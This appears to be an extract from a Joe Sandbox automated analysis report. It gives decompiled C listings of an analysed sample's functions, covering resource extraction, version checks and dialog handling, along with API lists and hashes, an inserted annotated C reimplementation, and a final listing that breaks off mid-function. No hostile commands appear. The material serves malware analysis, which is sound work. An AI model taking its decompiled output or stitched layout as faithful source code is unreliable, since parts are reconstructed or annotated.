		if(_t22 <= 7) {
			L8:
			EndDialog(_a4, _t22);
			return 1;
		}
		if(_t22 != 0x839) {
			goto L11;
		}
		 *0x3991dc = 1;
		goto L8;
	}
	return 0;
}

APIs
• EndDialog.USER32(?,?), ref: 00393490
• GetDesktopWindow.USER32 ref: 0039349A
• SetWindowTextA.USER32(?,nst0dum), ref: 003934B2
• SetDlgItemTextA.USER32(?,00000838), ref: 003934C4
• SetForegroundWindow.USER32(?), ref: 003934CB
• EndDialog.USER32(?,00000002), ref: 003934D8
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Window$DialogText$DesktopForegroundItem
• String ID: nst0dum
• API String ID: 852535152-432003757
• Opcode ID: a148c3c82ab325352143f1a13220a0ac5fe4f830ae343444439ea0368aed1d0f
• Instruction ID: 28c865bf0e744a733818153d94b358befc82f93a6692e58191e51ebb609e1b37
• Opcode Fuzzy Hash: a148c3c82ab325352143f1a13220a0ac5fe4f830ae343444439ea0368aed1d0f
• Instruction Fuzzy Hash: AD01D472240514ABCF275F6ADC0C97E3B68EB09700F134126F956869A0CB329F42CBC5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
E00392AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t16;
	int _t21;
	char _t32;
	intOrPtr _t34;
	char* _t38;
	char _t42;
	char* _t44;
	CHAR* _t52;
	intOrPtr* _t55;
	CHAR* _t59;
	void* _t62;
	CHAR* _t64;
	CHAR* _t65;
	signed int _t66;

	_t60 = __edx;
	_t16 =  *0x398004; // 0x74c05eb4
	_t17 = _t16 ^ _t66;
	_v8 = _t16 ^ _t66;
	_t65 = _a4;
	_t44 = __edx;
	_t64 = __ecx;
	if( *((char*)(__ecx)) != 0) {
		GetModuleFileNameA( *0x399a3c,  &_v268, 0x104);
		while(1) {
			_t17 =  *_t64;
			if(_t17 == 0) {
				break;
			}
			_t21 = IsDBCSLeadByte(_t17);
			 *_t65 =  *_t64;
			if(_t21 != 0) {
				_t65[1] = _t64[1];
			}
			if( *_t64 != 0x23) {
				L19:
				_t65 = CharNextA(_t65);
			} else {
				_t64 = CharNextA(_t64);
                                                                                                                                                                                                    							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                    								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                    									if( *_t64 == 0x23) {
                                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00391680(_t65, E003917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    									_t52 = _t65;
                                                                                                                                                                                                    									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                    									_t60 = _t14;
                                                                                                                                                                                                    									do {
                                                                                                                                                                                                    										_t32 =  *_t52;
                                                                                                                                                                                                    										_t52 =  &(_t52[1]);
                                                                                                                                                                                                    									} while (_t32 != 0);
                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								E003965E8( &_v268);
                                                                                                                                                                                                    								_t55 =  &_v268;
                                                                                                                                                                                                    								_t62 = _t55 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t34 =  *_t55;
                                                                                                                                                                                                    									_t55 = _t55 + 1;
                                                                                                                                                                                                    								} while (_t34 != 0);
                                                                                                                                                                                                    								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                    								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                    									 *_t38 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E00391680(_t65, E003917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    								_t59 = _t65;
                                                                                                                                                                                                    								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                    								_t60 = _t12;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t42 =  *_t59;
                                                                                                                                                                                                    									_t59 =  &(_t59[1]);
                                                                                                                                                                                                    								} while (_t42 != 0);
                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                    								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t64 = CharNextA(_t64);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *_t65 = _t17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                    			}
Address column of the listing above (one entry per listing line, in listing order, as emitted by the Joe Sandbox IDA plugin; the original side-by-side layout was lost in extraction):
0x00392aac 0x00392ab7 0x00392abc 0x00392abe 0x00392ac3 0x00392ac6 0x00392ac9 0x00392ace 0x00392ae6 0x00392bdc
0x00392bdc 0x00392be0 0x00000000 0x00000000 0x00392af2 0x00392afc 0x00392b00 0x00392b05 0x00392b05 0x00392b0b
0x00392bca 0x00392bd1 0x00392b11 0x00392b18 0x00392b26 0x00392b99 0x00392bc8 0x00000000 0x00000000 0x00392b9b
0x00392bae 0x00392bb3 0x00392bb5 0x00392bb5 0x00392bb8 0x00392bb8 0x00392bba 0x00392bbb 0x00000000 0x00392bb8
0x00392b28 0x00392b2e 0x00392b33 0x00392b39 0x00392b3c 0x00392b3c 0x00392b3e 0x00392b3f 0x00392b55 0x00392b5d
0x00392b64 0x00392b64 0x00392b7a 0x00392b7f 0x00392b81 0x00392b81 0x00392b84 0x00392b84 0x00392b86 0x00392b87
0x00392bbf 0x00392bc1 0x00392bc1 0x00392b26 0x00392bda 0x00392bda 0x00392be6 0x00392be6 0x00392bf8

APIs
• GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00392AE6
• IsDBCSLeadByte.KERNEL32(00000000), ref: 00392AF2
• CharNextA.USER32(?), ref: 00392B12
• CharUpperA.USER32 ref: 00392B1E
• CharPrevA.USER32(?,?), ref: 00392B55
• CharNextA.USER32(?), ref: 00392BD4
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
• String ID:
• API String ID: 571164536-0
• Opcode ID: 54b1e606e0ae0b8fbf5129ca598280574315115ea1072d5d7a08838623baca66
• Instruction ID: 6df2adc247ed06cedfdd9871f4363eddb568629af2971d68c4e36d5d83d63293
• Opcode Fuzzy Hash: 54b1e606e0ae0b8fbf5129ca598280574315115ea1072d5d7a08838623baca66
• Instruction Fuzzy Hash: 1C414535508A466FDF179F349C04AFE7BAD9F52300F1401DAE8C297202DB368E86CBA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E003928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				// __ecx: table object; entry count at +0x7c, per-entry data offset at +0x80, entries 0x3c bytes apart
				// __edx: path of the file whose version resource is read (GetFileVersionInfoSizeA / GetFileVersionInfoA)
				// _a8:   receives the index of the entry at which the walk stopped
				// Returns 1 when every entry was examined to the end, 0 when the walk stopped early at the
				// entry whose index is stored in *_a8.
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _t62;  // temporaries the listing uses but never declares;
				void* _t110;    // _t110 is the frame pointer (_vN is *(_t110 - N))
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {  // no entries: nothing to walk
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						// per-entry name/pattern check (E00392773); a 0 result stops the walk at this entry
						if(E00392773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x393938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);  // size of the file's version resource; 0 when it has none
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							// no version resource: skip the entry when its fields at +0x84/+0x88 are both 0, otherwise stop here
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);  // 0x42 = GMEM_MOVEABLE | GMEM_ZEROINIT
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x393938
									// load the resource and query the root block "\\" (VS_FIXEDFILEINFO); any failure skips the entry via L15
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;        // next entry (0x3c bytes further)
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										// VS_FIXEDFILEINFO: +0x8 dwFileVersionMS (major.minor), +0xc dwFileVersionLS (build.revision)
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;  // bound pairs stored in the entry from +0x94 on
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											// two passes, each comparing the file version (MS/LS) with a pair of bounds via E00392A89
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00392A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00392A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										// range check on the four comparison results: both conditions hold -> stop at this entry (return 0), else skip it
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;            // index of the entry the walk stopped at
				if(_t103 != 0) {
					GlobalFree(_t103);   // release the version block
				}
				return _t106;
			}
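The listing above reads a file's version resource and walks a table of per-file version ranges. The following is an added example, not code from the sample or from Joe Sandbox, showing the same lookup in portable C: it decodes the VS_FIXEDFILEINFO root block that VerQueryValueA(block, "\\", ...) returns (the +0x8/+0xc reads in the listing) and walks a hypothetical rule table of file names with inclusive version ranges. The table layout, the rule names, the case-insensitive basename match standing in for E00392773, and the lexicographic version compare standing in for E00392A89 are all assumptions; the version block is a constructed byte string so the example runs offline, whereas on Windows it would come from GetFileVersionInfoSizeA, GlobalAlloc, GetFileVersionInfoA and VerQueryValueA exactly as in E003928E8.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not the sample's code. Documented VS_FIXEDFILEINFO constants. */
#define VS_FFI_SIGNATURE 0xFEEF04BDu   /* dwSignature */
#define VS_FFI_SIZE      52u           /* sizeof(VS_FIXEDFILEINFO) */

typedef struct { uint16_t major, minor, build, revision; } file_version_t;

/* Hypothetical rule standing in for the 0x3c-byte table entries E003928E8 walks:
 * a file name plus an inclusive [lo, hi] version range (assumed layout). */
typedef struct {
    const char    *file_name;
    file_version_t lo, hi;
} version_rule_t;

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode the root block: +0x08 dwFileVersionMS = major<<16 | minor,
 * +0x0c dwFileVersionLS = build<<16 | revision. Returns 0 if it is not a version block. */
int decode_fixed_file_info(const uint8_t *blk, size_t len, file_version_t *out)
{
    if (blk == NULL || len < VS_FFI_SIZE || rd32le(blk) != VS_FFI_SIGNATURE)
        return 0;
    uint32_t ms = rd32le(blk + 8), ls = rd32le(blk + 12);
    out->major = (uint16_t)(ms >> 16); out->minor    = (uint16_t)(ms & 0xFFFF);
    out->build = (uint16_t)(ls >> 16); out->revision = (uint16_t)(ls & 0xFFFF);
    return 1;
}

/* Lexicographic compare of major.minor.build.revision: <0, 0 or >0. */
int version_cmp(const file_version_t *a, const file_version_t *b)
{
    if (a->major    != b->major)    return a->major    < b->major    ? -1 : 1;
    if (a->minor    != b->minor)    return a->minor    < b->minor    ? -1 : 1;
    if (a->build    != b->build)    return a->build    < b->build    ? -1 : 1;
    if (a->revision != b->revision) return a->revision < b->revision ? -1 : 1;
    return 0;
}

/* Case-insensitive ASCII compare of the path's last component with the rule name
 * (Windows file names are case-insensitive). Stands in for E00392773 (assumption). */
static int basename_matches(const char *path, const char *name)
{
    const char *b = path;
    for (const char *p = path; *p; p++)
        if (*p == '\\' || *p == '/') b = p + 1;
    for (; *b && *name; b++, name++)
        if (tolower((unsigned char)*b) != tolower((unsigned char)*name)) return 0;
    return *b == '\0' && *name == '\0';
}

/* Walk the rules in order; return the index of the first rule whose name matches the
 * path and whose range contains ver, or -1 when every rule was examined. */
int match_version_rule(const version_rule_t *rules, size_t n, const char *path,
                       const file_version_t *ver)
{
    for (size_t i = 0; i < n; i++) {
        if (!basename_matches(path, rules[i].file_name)) continue;
        if (version_cmp(ver, &rules[i].lo) < 0) continue;   /* older than lo */
        if (version_cmp(ver, &rules[i].hi) > 0) continue;   /* newer than hi */
        return (int)i;
    }
    return -1;
}

/* Constructed root block for file version 10.0.19041.1 (little-endian); the remaining
 * fields of the 52-byte structure are left zero because the lookup never reads them. */
static const uint8_t SAMPLE_BLOCK[VS_FFI_SIZE] = {
    0xBD, 0x04, 0xEF, 0xFE,   /* dwSignature     = 0xFEEF04BD */
    0x00, 0x00, 0x01, 0x00,   /* dwStrucVersion  = 0x00010000 */
    0x00, 0x00, 0x0A, 0x00,   /* dwFileVersionMS = 0x000A0000 -> 10.0 */
    0x01, 0x00, 0x61, 0x4A,   /* dwFileVersionLS = 0x4A610001 -> 19041.1 */
};

/* Constructed rule table (names and ranges are illustrative, not from the sample). */
static const version_rule_t SAMPLE_RULES[] = {
    { "chrome.dll",   {100, 0, 0, 0},     {120, 0xFFFF, 0xFFFF, 0xFFFF} },
    { "kernel32.dll", {6, 1, 0, 0},       {10, 0, 17763, 0xFFFF} },   /* ends before 19041 */
    { "kernel32.dll", {10, 0, 18362, 0},  {10, 0, 22631, 0xFFFF} },
};
#define SAMPLE_RULE_COUNT (sizeof SAMPLE_RULES / sizeof SAMPLE_RULES[0])

/* Decode the constructed block and look it up for kernel32; returns the rule index. */
int run_sample(file_version_t *v)
{
    if (!decode_fixed_file_info(SAMPLE_BLOCK, sizeof SAMPLE_BLOCK, v)) return -2;
    return match_version_rule(SAMPLE_RULES, SAMPLE_RULE_COUNT,
                              "C:\\Windows\\System32\\KERNEL32.DLL", v);
}

int main(void)
{
    file_version_t v;
    int idx = run_sample(&v);
    printf("file version %u.%u.%u.%u -> rule %d\n", (unsigned)v.major, (unsigned)v.minor,
           (unsigned)v.build, (unsigned)v.revision, idx);
    return idx < 0;
}
```

The signature check matters in practice: VerQueryValueA with "\\" only succeeds for a block that GetFileVersionInfoA filled, and a caller that reads +0x8/+0xc from an unchecked buffer (as the listing does once VerQueryValueA has returned a non-zero length) is trusting the resource parser entirely.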
Statement address column of the listing above: addresses 0x003928f1 through 0x00392a64 (0x00000000 marks lines without a mapped address).
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392955
                                                                                                                                                                                                    0x0039295e
                                                                                                                                                                                                    0x00392962
                                                                                                                                                                                                    0x00392969
                                                                                                                                                                                                    0x0039296f
                                                                                                                                                                                                    0x00392974
                                                                                                                                                                                                    0x0039297e
                                                                                                                                                                                                    0x0039298c
                                                                                                                                                                                                    0x00392a20
                                                                                                                                                                                                    0x00392a21
                                                                                                                                                                                                    0x00392a27
                                                                                                                                                                                                    0x00392a4c
                                                                                                                                                                                                    0x00392a4f
                                                                                                                                                                                                    0x00392a50
                                                                                                                                                                                                    0x00392a53
                                                                                                                                                                                                    0x00392a56
                                                                                                                                                                                                    0x00392a5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003929b2
                                                                                                                                                                                                    0x003929b2
                                                                                                                                                                                                    0x003929b5
                                                                                                                                                                                                    0x003929bd
                                                                                                                                                                                                    0x003929c3
                                                                                                                                                                                                    0x003929cc
                                                                                                                                                                                                    0x003929d5
                                                                                                                                                                                                    0x003929d7
                                                                                                                                                                                                    0x003929da
                                                                                                                                                                                                    0x003929dd
                                                                                                                                                                                                    0x003929df
                                                                                                                                                                                                    0x003929ec
                                                                                                                                                                                                    0x003929f8
                                                                                                                                                                                                    0x003929fc
                                                                                                                                                                                                    0x003929ff
                                                                                                                                                                                                    0x00392a02
                                                                                                                                                                                                    0x00392a07
                                                                                                                                                                                                    0x00392a0a
                                                                                                                                                                                                    0x00392a0f
                                                                                                                                                                                                    0x00392a19
                                                                                                                                                                                                    0x00392a81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392a0f
                                                                                                                                                                                                    0x0039298c
                                                                                                                                                                                                    0x00392974
                                                                                                                                                                                                    0x00392962
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039294f
                                                                                                                                                                                                    0x00392912
                                                                                                                                                                                                    0x00392a65
                                                                                                                                                                                                    0x00392a68
                                                                                                                                                                                                    0x00392a6c
                                                                                                                                                                                                    0x00392a6f
                                                                                                                                                                                                    0x00392a6f
                                                                                                                                                                                                    0x00392a7d

APIs
• GlobalFree.KERNEL32 ref: 00392A6F
  • Part of subcall function 00392773: CharUpperA.USER32(74C05EB4,00000000,00000000,00000000), ref: 003927A8
  • Part of subcall function 00392773: CharNextA.USER32(0000054D), ref: 003927B5
  • Part of subcall function 00392773: CharNextA.USER32(00000000), ref: 003927BC
  • Part of subcall function 00392773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392829
  • Part of subcall function 00392773: RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392852
  • Part of subcall function 00392773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392870
  • Part of subcall function 00392773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003928A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00393938,?,?,?,?,-00000005), ref: 00392958
• GlobalLock.KERNEL32 ref: 00392969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00393938,?,?,?,?,-00000005,?), ref: 00392A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00393938,?,?), ref: 00392A81
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID: 899
• API String ID: 3949799724-2226677896
• Opcode ID: 7d72817b921b40c2e599ed0a23b48bcd7889c40a582234ddfa6d4536cbcfebfe
• Instruction ID: bf7a2c78d06e83f251fac8462fb423496abb8c7954ef8c30a40de17c00c795f0
• Opcode Fuzzy Hash: 7d72817b921b40c2e599ed0a23b48bcd7889c40a582234ddfa6d4536cbcfebfe
• Instruction Fuzzy Hash: 00512932E00619EFCF26DF98C884AAEBBB9FF48700F15412AE905E7211DB319951DB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E003943D0(struct HWND__* __ecx, struct HWND__* __edx) {
	signed int _v8;
	struct tagRECT _v24;
	struct tagRECT _v40;
	struct HWND__* _v44;
	intOrPtr _v48;
	int _v52;
	intOrPtr _v56;
	int _v60;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t29;
	void* _t53;
	intOrPtr _t56;
	int _t59;
	struct HWND__* _t63;
	struct HWND__* _t67;
	struct HWND__* _t68;
	struct HDC__* _t69;
	int _t72;
	signed int _t74;

	_t63 = __edx;
	_t29 =  *0x398004; // 0x74c05eb4
	_v8 = _t29 ^ _t74;
	_t68 = __edx;
	_v44 = __ecx;
	GetWindowRect(__ecx,  &_v40);
	_t53 = _v40.bottom - _v40.top;
	_v48 = _v40.right - _v40.left;
	GetWindowRect(_t68,  &_v24);
	_v56 = _v24.bottom - _v24.top;
	_t69 = GetDC(_v44);
	_v52 = GetDeviceCaps(_t69, 8);
	_v60 = GetDeviceCaps(_t69, 0xa);
	ReleaseDC(_v44, _t69);
	_t56 = _v48;
	asm("cdq");
	_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
	_t67 = 0;
	if(_t72 >= 0) {
		_t63 = _v52;
		if(_t72 + _t56 > _t63) {
			_t72 = _t63 - _t56;
		}
	} else {
                                                                                                                                                                                                    					_t72 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                    				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                                                    					_t63 = _v60;
                                                                                                                                                                                                    					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                    						_t59 = _t63 - _t53;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t59 = _t67;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003943F1
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0039440B
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00394423
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0039442E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0039443A
                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00394447
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003944A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2212493051-0
                                                                                                                                                                                                    • Opcode ID: 198b3ee906333cf4a4780e7f7bc8607732d3058d2bf09bf958337749ab335e5c
                                                                                                                                                                                                    • Instruction ID: 7fd7a6fed4c8ca4792a58ba5570bc0f5127ea893a314b5ebb96036a7bd0b4674
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 198b3ee906333cf4a4780e7f7bc8607732d3058d2bf09bf958337749ab335e5c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B314F71E00519AFCF15CFB9DD49DEEBBB9EB89310F154269F805B3250DA31AC058BA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                    			E00396298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				struct HINSTANCE__* _v36;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				struct HRSRC__* _t21;
                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				struct HINSTANCE__* _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t16 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                    				_t46 = 0;
                                                                                                                                                                                                    				_v32 = __ecx;
                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                    				_t36 = 1;
                                                                                                                                                                                                    				E0039171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t51 = _t51 + 0x10;
                                                                                                                                                                                                    					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                    					if(_t45 == 0) {
                                                                                                                                                                                                    						 *0x399124 = 0x80070714;
                                                                                                                                                                                                    						_t36 = _t46;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                    						_t44 = _t5;
                                                                                                                                                                                                    						_t40 = _t44;
                                                                                                                                                                                                    						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                    						_t47 = _t6;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x39a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
